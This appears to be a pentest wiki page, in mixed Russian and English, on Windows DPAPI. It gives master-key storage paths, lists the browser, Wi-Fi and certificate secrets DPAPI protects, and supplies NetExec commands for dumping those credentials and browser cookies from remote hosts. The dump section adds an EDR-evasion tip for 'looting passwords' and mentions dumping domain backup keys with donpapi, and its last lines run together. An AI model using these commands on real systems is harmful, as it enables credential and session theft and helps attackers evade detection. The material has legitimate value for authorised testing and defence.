DPAPI
Data Protection API
Master keys
Пользовательский мастер-ключ хранится в профиле пользователя по следующему пути:
Users\%USER%\AppData\Roaming\Microsoft\Protect\%SID%\
Системные мастер-ключи хранятся по следующему пути:
windows\system32\Microsoft\Protect\S-1-5-18\
Аналогично с пользователем – используется один мастер-ключ, имя которого можно найти в файле Preferred, где хранятся все когда-либо используемые ключи.
What Stored
DPAPI используется для шифрования закрытых ключей клиентских и системных сертификатов, WIFI ключей, Chrome (cookie, паролей), DropBox, Skype, RSA SecurID (софтварного приложения, которое генерирует одноразовые ключи) etc.
Dump
You can dump DPAPI credentials using NetExec using the following option --dpapi. It will get all secrets from Credential Manager, Chrome, Edge, Firefox. --dpapi support options :
cookies : Collect every cookies in browsers
nosystem : Won't collect system credentials. This will prevent EDR from stopping you from looting passwords
You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account
nxc smb <ip> -u user -p password --dpapi
nxc smb <ip> -u user -p password --dpapi cookies
nxc smb <ip> -u user -p password --dpapi nosystemDomain postexploit
Dump backup domain keys for decrypt secrets dpapi:
shoot donpapi with opsec flag
Last updated